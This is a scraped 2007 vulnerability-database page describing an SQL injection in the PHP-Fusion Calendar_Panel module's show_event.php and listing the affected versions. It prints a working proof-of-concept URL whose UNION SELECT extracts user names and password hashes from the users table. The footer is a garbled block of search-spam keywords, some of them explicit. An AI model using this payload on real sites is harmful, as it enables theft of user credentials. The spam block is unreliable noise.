about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHP-Fusion Calendar_Panel Module Show_Event.PHP SQL Injection Vulnerability


Title PHP-Fusion Calendar_Panel Module Show_Event.PHP SQL Injection Vulnerability
Published 2007-03-31-12:00AM
Updated 2007-04-02-08:22PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  UNIQUE-KEY[UNIQUE-CRACKER] is credited with the discovery of this vulnerability.
Vulnerable  PHPFusion PHP_Fusion 6.1.4
PHPFusion PHPFusion 6.1.5
PHPFusion PHPFusion 6.0.307
PHPFusion PHPFusion 6.0.204
PHPFusion PHPFusion 6.0.110
PHPFusion PHPFusion 6.0.109
PHPFusion PHPFusion 6.0.107
PHPFusion PHPFusion 6.0.105
PHPFusion PHPFusion 6.0 306
PHPFusion PHPFusion 6.0 304
PHPFusion PHPFusion 6.0 303
PHPFusion PHPFusion 6.0 0.3
PHPFusion PHPFusion 6.0 .206
PHPFusion PHPFusion 6.0 .106
PHPFusion PHPFusion 5.0 1 Service Pack
PHPFusion PHPFusion 5.0
PHPFusion PHPFusion 4.0 1
PHPFusion PHPFusion 4.00
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof of concept and exploit code are available:

http://www.example.com/script/infusions/calendar_panel/show_event.php?m_month=-1/**/UNI
ON/**/SELECT/**/0,1,user_password,user_name,4,5,6,7,8,9,10,11/**/FROM/**/fusion_u
sers/* /data/vulnerabilities/exploits/23225.pl
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 22:34:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
joomla/?_R linux 2.6. girlsgonew ass69ass Www.nayana manwomanse PHP+Advanc www.xNxx.c My_eGaller Www.ashian courier mt free celeb brest fedi www.xNxx.c Mallikaser www.cqyiji lo414l backdoor 200 /compo ass69ass Sabdrimer nicole sch bia3x kar2 WWW.XXLN naked tabu ww.sax pic wndows 200 linux back www.sexxy 2.4 root apache 2.0 Crack Data reverse ph indansex4u www.trish 64.15.155. nikolsex php-nuke 2 phpbb port Condition Check Poin Free gonzo Www animal smartschoo sxe inject news for c girlspussy news for c openSSH 4. TRANSLET